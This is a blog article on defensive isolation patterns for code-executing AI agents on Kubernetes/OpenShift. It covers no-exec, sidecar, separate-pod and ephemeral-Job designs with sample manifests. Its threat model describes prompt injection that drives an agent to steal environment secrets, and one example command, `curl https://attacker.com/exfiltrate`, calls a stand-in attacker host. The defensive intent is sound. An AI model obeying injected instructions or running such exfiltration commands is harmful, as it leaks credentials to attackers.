Code Execution Isolation Patterns for AI Agents in Kubernetes

From locked-down baseline to ephemeral sandboxes — a POC of four architectures/patterns validated on Red Hat OpenShift, and why the choice between them is a security decision

Part 2 of 2

← [Part 1: Every AI Coding Tool Is an Agent VM]

In Part 1, I established the three-layer architecture behind every agentic system and explained why whether or not the agent needs to execute code determines its security posture.

This article covers four patterns across a spectrum of isolation validated on a local OpenShift cluster, as well as the threat model that explains why the choice between them isn’t just an ops decision.

Table of Contents

  1. The Threat First
  2. The Lab Setup for the POC/Demo
  3. Pattern 1 — No-Exec Baseline
  4. Pattern 2 — Sidecar Exec Server
  5. Pattern 3 — Separate Exec Pod
  6. Pattern 4 — Exec Dispatcher (Ephemeral Jobs)
  7. Summary and Concluding Remarks

The Threat First

Before patterns: the threat model.

Prompt injection is the scenario where an adversarial input (be it a document the agent reads, a web page it fetches or a tool response from an upstream API) contains instructions that manipulate the agent into taking unintended actions. OWASP lists it as the primary risk for agentic systems. [¹]

Against an agent with no exec capability, the blast radius is bounded by what it can do through API calls: a bad API call, malicious output, access to data it shouldn’t see. That bounds the potential damage.

Against an agent with exec capability and a writable filesystem, a successful prompt injection is equivalent to arbitrary code execution inside a pod in your cluster. The attacker can potentially exfiltrate environment variables (which could contain API keys, database credentials, service tokens), spawn persistent subprocesses, write to writable paths, or make outbound calls to attacker-controlled infrastructure.

The four patterns below are four different answers to the same question: how do you give an agent execution capability while limiting what a compromised exec surface can actually do?

The Lab Setup for the POC/Demo

All four patterns run the same agent: a LangGraph Planner→Researcher→Analyst pipeline, calling a Claude model via Amazon Bedrock. The agent code is identical across all four. What changes is the execution environment wired to Layer 2.

A note on accuracy: The cluster outputs and security configs below were validated on a local OpenShift cluster (CRC, OCP 4.x). Implementation details such as SCC behaviour, NetworkPolicy DNS ports, and resource quotas vary by platform and version. Treat the patterns as reference architectures and verify against your own cluster’s security policies before adopting them.

The exec component is a minimal FastAPI service: it accepts `POST /exec {code, runtime}`, runs Python or bash in a subprocess, and returns `{stdout, stderr, exit_code}`. The security work happens in where it runs and what it can reach, not inside the server itself.

Agent (LangGraph pipeline)

│ POST /exec {"code": "import sys; print(sys.version)", "runtime": "python"}

[exec server] <---- this is what changes between patterns

└── returns {stdout, stderr, exit_code}
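For illustration, the core of such an exec server might look like the sketch below — a plain function that a FastAPI `POST /exec` handler would wrap. The function name, timeout default, and error codes are my own assumptions, not the article’s actual code:

```python
import subprocess
import sys

def exec_snippet(code: str, runtime: str = "python", timeout: int = 30) -> dict:
    """Run a snippet in a subprocess and return {stdout, stderr, exit_code}.

    Illustrative sketch of the exec-server core; a FastAPI handler would
    call this and serialise the dict as the /exec response.
    """
    if runtime == "python":
        cmd = [sys.executable, "-c", code]
    elif runtime == "bash":
        cmd = ["bash", "-c", code]
    else:
        return {"stdout": "", "stderr": f"unknown runtime: {runtime}", "exit_code": 2}
    try:
        proc = subprocess.run(cmd, capture_output=True, text=True, timeout=timeout)
        return {"stdout": proc.stdout, "stderr": proc.stderr, "exit_code": proc.returncode}
    except subprocess.TimeoutExpired:
        # Mirror the shell convention of exit code 124 for timeouts
        return {"stdout": "", "stderr": "timeout", "exit_code": 124}
```

Note that nothing in this function sandboxes anything — which is exactly the point the patterns below address.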

Pattern 1 — No-Exec Baseline

The idea: The agent has no exec-surface / subprocess tool and cannot run LLM-generated code at runtime. It can still call APIs, query databases, and invoke any tool explicitly wired by the developer. Nothing executes as a subprocess inside the cluster.

The setup for this POC:

┌──────────────────────────────────────────────────────────┐
│ Pod: agent-vm-part1 │
│ │
│ ┌────────────────────────────────────────────────────┐ │
│ │ agent container │ │
│ │ readOnlyRootFilesystem: true (/tmp via emptyDir) │ │
│ │ allowPrivilegeEscalation: false │ │
│ │ capabilities: DROP ALL │ │
│ └────────────────────────────────────────────────────┘ │
│ │
│ No exec server. No subprocess tool. Root fs read-only. │
└──────────────────────────────────────────────────────────┘


╔══════════════════════════════════════════════════════╗
║ AGENT VM — THREE-LAYER CONFIG ║
╠══════════════════════════════════════════════════════╣
║ Layer 1 (Runtime): OCP pod · pattern=no-exec ║
║ Layer 2 (Tools): LLM API only — no code execution║
║ Layer 3 (Skills): analysis, research, synthesis ║
╚══════════════════════════════════════════════════════╝

The enforcement here works at two layers. The primary enforcement is at the application layer: the LangGraph graph has no exec tool registered, so the LLM has no function to call that spawns a subprocess. The secondary enforcement is at the infrastructure layer: `readOnlyRootFilesystem: true` prevents writes to the root filesystem (`/tmp` stays writable via an emptyDir mount, since the Python runtime requires it). Skills are mounted read-only from a ConfigMap at `/app/skills`.

The primary enforcement is two lines in the agent application:

# agent-app/app/main.py - run_code() is the only exec pathway in the agent
async def run_code(code: str, runtime: str = "python3") -> str:
    if AGENT_PATTERN == "no-exec":
        return "[exec not available in no-exec pattern]"

The LLM cannot call `run_code()` directly and can only invoke tools explicitly registered in the LangGraph graph. In Pattern 1, no exec tool is registered.
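The registration gate can be sketched as a pure function — the tool names here are illustrative, not the article’s actual tool list:

```python
def registered_tools(pattern: str) -> list[str]:
    """Return the tool names wired into the graph for a given pattern.

    Only names in this list are callable by the LLM; in the no-exec
    pattern the exec tool is simply never registered, so there is no
    function the model could be injected into calling.
    """
    tools = ["web_search", "summarise"]   # read-only tools, always available
    if pattern != "no-exec":
        tools.append("run_code")          # exec pathway exists only outside Pattern 1
    return tools
```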

Security context applied; exec boundary enforced

When to use: agents producing text outputs — synthesis, summarisation, Q&A, research, orchestration. If the LLM’s job is to reason and return structured output rather than run code, there is no reason to introduce an exec surface. This is arguably the right default for the majority of well-defined enterprise AI use cases.

Pattern 2 — Sidecar Exec Server

The idea: Run the exec server as a second container in the same pod as the agent. The agent calls it at `localhost:9000`: no network hop, no DNS lookup, and no separate Kubernetes Deployment.

┌──────────────────────────────────────────────────────────┐
│ Pod: agent-vm-part2 │
│ │
│ ┌──────────────────────┐ ┌─────────────────────────┐ │
│ │ agent │ │ exec-server (sidecar) │ │
│ │ │───►│ │ │
│ │ readOnly: true │ │ readOnly: false │ │
│ │ caps: DROP ALL │ │ /tmp writable │ │
│ │ │ │ caps: DROP ALL │ │
│ └──────────────────────┘ └─────────────────────────┘ │
│ │
│ Shared network namespace (localhost:9000) │
└──────────────────────────────────────────────────────────┘

The agent container stays maximally locked down. The exec-server sidecar relaxes exactly what it needs, providing a writable `/tmp` for script execution. The key difference from Pattern 1 is a single env var change and a second container in the deployment:

# part2-sidecar/01-deployment-sidecar.yaml (excerpted)
containers:
- name: agent
  securityContext:
    readOnlyRootFilesystem: true      # agent stays locked
    allowPrivilegeEscalation: false
    capabilities: { drop: ["ALL"] }
  env:
  - name: AGENT_PATTERN
    value: "sidecar"
  - name: EXEC_SERVER_URL
    value: "http://localhost:9000"    # sidecar in same pod

- name: exec-server
  securityContext:
    readOnlyRootFilesystem: false     # exec server needs to write scripts to /tmp
    allowPrivilegeEscalation: false
    capabilities: { drop: ["ALL"] }
Two containers in the pod; the agent locked down while the exec-server is not; Python execution confirmed via the route

The agent and exec-server share a pod: the same IP, the same network namespace, the same lifecycle. A prompt injection that manipulates the exec-server can therefore reach anything the agent pod can reach.

For internal agents where inputs are trusted (developer tooling, internal data pipelines, tightly scoped automation), sidecar is operationally simple and reasonable. The exposure is limited by whatever NetworkPolicy applies at the pod level.
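One thing worth noting: from the agent’s side, the exec call is just an HTTP POST against `EXEC_SERVER_URL`, which is what makes the patterns swappable. A minimal client sketch (URL and field names as assumed in this POC, not the article’s exact code):

```python
import json
import os
import urllib.request

# Pattern 2 points this at the sidecar; Patterns 3-4 change only this URL.
EXEC_SERVER_URL = os.getenv("EXEC_SERVER_URL", "http://localhost:9000")

def build_exec_request(code: str, runtime: str = "python") -> urllib.request.Request:
    """Build the POST /exec request the agent sends; identical across patterns."""
    body = json.dumps({"code": code, "runtime": runtime}).encode()
    return urllib.request.Request(
        f"{EXEC_SERVER_URL}/exec",
        data=body,
        headers={"Content-Type": "application/json"},
        method="POST",
    )

def run_code(code: str, runtime: str = "python") -> dict:
    """Send the snippet and parse {stdout, stderr, exit_code} from the response."""
    with urllib.request.urlopen(build_exec_request(code, runtime), timeout=60) as resp:
        return json.load(resp)
```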

Pattern 3 — Separate Exec Pod

The idea: Move the exec server out of the agent pod entirely, into its own pod. The key addition here is that the exec pod gets deny-all egress, highlighting the different network policies applied to the two pods.

┌──────────────────────────┐    cluster DNS    ┌────────────────────────────┐
│ Pod: agent-vm-part3 │ ──────────────► │ Pod: exec-server-part3 │
│ │ exec-svc:9000 │ │
│ agent │ │ exec-server │
│ readOnly: true │ │ /tmp writable │
│ egress: LLM + exec svc │ │ egress: DENY ALL │
└──────────────────────────┘ └────────────────────────────┘

Even if a prompt injection causes the exec-server to run `curl https://attacker.com/exfiltrate`, the NetworkPolicy blocks it. The exec surface cannot reach the LLM, cannot reach external APIs, and cannot phone home (admittedly a bit of a simplified example).

The isolation is enforced by a NetworkPolicy on the exec pod — one field does the work:

# part3-sandbox/03-networkpolicy.yaml (excerpted)
# Exec pod: deny all egress
spec:
  podSelector:
    matchLabels:
      app: exec-server-part3
  policyTypes: [Ingress, Egress]
  ingress:
  - from: [podSelector: {matchLabels: {app: agent-vm-part3}}]
    ports: [{port: 9000}]
  egress: []   # ← deny all — exec pod has zero outbound network access

The agent pod gets egress allowed to the exec service on port 9000, DNS on 53, HTTPS on 443 for the LLM API, etc.
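A sketch of the corresponding agent-side policy, under the assumption of standard cluster DNS and an HTTPS LLM endpoint (labels and ports illustrative):

```yaml
# Agent pod: egress only to the exec service, DNS, and the LLM API (sketch)
spec:
  podSelector:
    matchLabels:
      app: agent-vm-part3
  policyTypes: [Egress]
  egress:
  - to: [podSelector: {matchLabels: {app: exec-server-part3}}]
    ports: [{port: 9000}]                                      # exec service
  - ports: [{port: 53, protocol: UDP}, {port: 53, protocol: TCP}]  # cluster DNS
  - ports: [{port: 443}]                                       # LLM API over HTTPS
```

On OpenShift, DNS may run on port 5353 instead of 53 depending on version — one of the platform-specific details flagged in the accuracy note above.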

Two separate pods; the exec pod’s egress blocked; calling the agent pod results in code running in the exec pod

Compared to a sidecar container, a separate pod provides stronger isolation at the cost of more operational overhead: two Deployments, one Service, and one NetworkPolicy per agent. But the blast radius of a compromised exec surface is far more contained. This security posture suits user-facing agents processing untrusted inputs — documents, web content, user-submitted data.

Pattern 4 — Exec Dispatcher (Ephemeral Jobs)

Patterns 2 and 3 share a structural problem: the exec surface is always on. There’s a running exec-server container or pod regardless of whether the agent is currently executing any code. For a platform with ten deployed agents, that’s ten idle exec surfaces consuming resources. Pattern 4 is a continuation of Pattern 3: spin up the exec environment on demand when the agent needs it, and tear it down afterwards. On Kubernetes, the natural primitive is the Job.

Agent  (namespace: agent-vm-poc-demo)

│ POST /exec {code, runtime}

Exec Dispatcher Service (namespace: agent-vm-poc-execdispatcher)

├── Creates K8s Job: fresh container, code injected as env var
├── Polls until succeeded/failed
├── Fetches pod logs
├── Deletes Job (TTL as safety net)
└── Returns {stdout, exit_code, job_id, duration_ms}

┌──────┴──────┐
│ exec Job │ (namespace: agent-vm-poc-execjobs)
│ pod │ deny-all NetworkPolicy
│ ephemeral │ no ServiceAccount token mounted
│ TTL: 60s │ fresh container per invocation
└─────────────┘

In this POC, I split them across three namespaces:

`agent-vm-poc-demo` — agent pods. Can POST to dispatcher. Cannot create Jobs directly.

`agent-vm-poc-execdispatcher` — dispatcher service. Has RBAC to create/delete Jobs in the execjobs namespace. Has K8s API access. Does not execute code itself.

`agent-vm-poc-execjobs` — ephemeral Job pods only. Deny-all NetworkPolicy (no egress, no ingress except the kubelet), no ServiceAccount token mounted, and the pod exits after running the code.

The dispatcher is the only component with permission to create Jobs in the exec namespace. The agent’s ServiceAccount cannot touch the K8s API.
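As a sketch, the RBAC granting that permission might look like the Role below, bound to the dispatcher’s ServiceAccount. The role name is hypothetical; the verbs and resources follow standard Kubernetes RBAC:

```yaml
# Role in the execjobs namespace for the dispatcher's ServiceAccount (sketch)
apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
  name: exec-job-manager
  namespace: agent-vm-poc-execjobs
rules:
- apiGroups: ["batch"]
  resources: ["jobs"]
  verbs: ["create", "get", "list", "watch", "delete"]   # manage ephemeral Jobs
- apiGroups: [""]
  resources: ["pods", "pods/log"]
  verbs: ["get", "list"]                                # fetch results from pod logs
```

Because this is a namespaced Role rather than a ClusterRole, a compromised dispatcher still cannot create workloads anywhere else in the cluster.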

The agent code is unchanged from Pattern 1 — only two env vars differ:

# part4-dispatcher agent deployment (excerpted)
env:
- name: AGENT_PATTERN
  value: "exec-dispatcher"
- name: EXEC_SERVER_URL
  value: "http://exec-dispatcher-svc.agent-vm-poc-execdispatcher.svc.cluster.local:8080"

Without going into the dispatcher’s internals, the idea is that `run_code()` in the agent calls `EXEC_SERVER_URL/exec` regardless of pattern. The dispatcher receives that call, creates an ephemeral Job, waits for it to complete, and returns the output. From the agent’s perspective, the API contract is the same as in Patterns 2 and 3.

The output hostname `exec-job-9ba7506d-kbtkw` is the ephemeral Job pod’s own name. It ran the code, printed its hostname, exited, and was garbage-collected. By the time the test completed, the execjobs namespace was empty again.
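As a sketch, the Job manifest the dispatcher submits might be built like this. The image name, env var names, and helper function are my assumptions; the security-relevant fields mirror the constraints described above:

```python
import uuid

def build_exec_job(code: str, runtime: str = "python") -> dict:
    """Build a Kubernetes Job manifest for one ephemeral execution (sketch).

    Mirrors the constraints above: no ServiceAccount token mounted,
    60s TTL as a garbage-collection safety net, never restarted,
    code injected via env var.
    """
    job_id = f"exec-job-{uuid.uuid4().hex[:8]}"
    return {
        "apiVersion": "batch/v1",
        "kind": "Job",
        "metadata": {"name": job_id, "namespace": "agent-vm-poc-execjobs"},
        "spec": {
            "ttlSecondsAfterFinished": 60,   # safety net if the dispatcher misses the delete
            "backoffLimit": 0,               # never retry attacker-influenced code
            "template": {
                "spec": {
                    "restartPolicy": "Never",
                    "automountServiceAccountToken": False,  # Job pod has no cluster credentials
                    "containers": [{
                        "name": "exec",
                        "image": "exec-runtime:latest",     # hypothetical runtime image
                        "env": [
                            {"name": "EXEC_CODE", "value": code},
                            {"name": "EXEC_RUNTIME", "value": runtime},
                        ],
                    }],
                }
            },
        },
    }
```

The dispatcher would pass this dict to the Kubernetes API (e.g. `create_namespaced_job` in the official Python client), poll for completion, and read the result from the pod logs.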

Compared to static exec pods, this provides the added benefits of:

- No idle exec surface — attack surface only exists during actual execution

- Fresh container per task — no state leakage between runs; a prompt injection that poisons `/tmp` in run N cannot affect run N+1

- Principle of least privilege at namespace scope — the agent never touches the K8s API, the dispatcher never executes code directly, the Job pod has no credentials

- Resource efficiency — (Theoretical) exec capacity scales with actual demand, not with number of deployed agents.

Note: This idea looks good to me in theory, but it requires solutioning beyond this POC. Building a reliable dispatcher means handling K8s API connectivity carefully, timing pod-log fetching correctly, and managing quotas in the exec namespace — so it may not be trivial to productionise.

Summary and Concluding Remarks

Security Properties and Concerns

(Not based on production experience) Consider these:

1. Default to no-exec. Deploy with `readOnlyRootFilesystem: true`, `allowPrivilegeEscalation: false`, capabilities dropped, deny-all egress except specific endpoints.

2. If you need exec, use the separate-pod pattern first. Don’t reach for the sidecar just because it’s simpler. The separate pod with its own NetworkPolicy gives you meaningful blast-radius containment.

3. If you’re building a platform, invest in a version of the dispatcher. It scales across many agents without accumulating idle exec surface.

The insight from Part 1 holds: Cursor and Claude Code work smoothly on your laptop because they have full Layer 1 trust. The challenge in production agent deployment — the one this POC explores — is building a runtime that gives agents *exactly enough* Layer 1 capability for the task.

Again this article isn’t meant to share a tried and tested production architecture or playbook; it’s simply meant to spark some thought and share my explorations (hence no github link shared :P).

References

¹ OWASP. *LLM01: Prompt Injection*. OWASP Top 10 for Large Language Model Applications, 2025. https://owasp.org/www-project-top-10-for-large-language-model-applications/


Code Execution Isolation Patterns for AI Agents in Kubernetes was originally published in Towards AI on Medium, where people are continuing the conversation by highlighting and responding to this story.
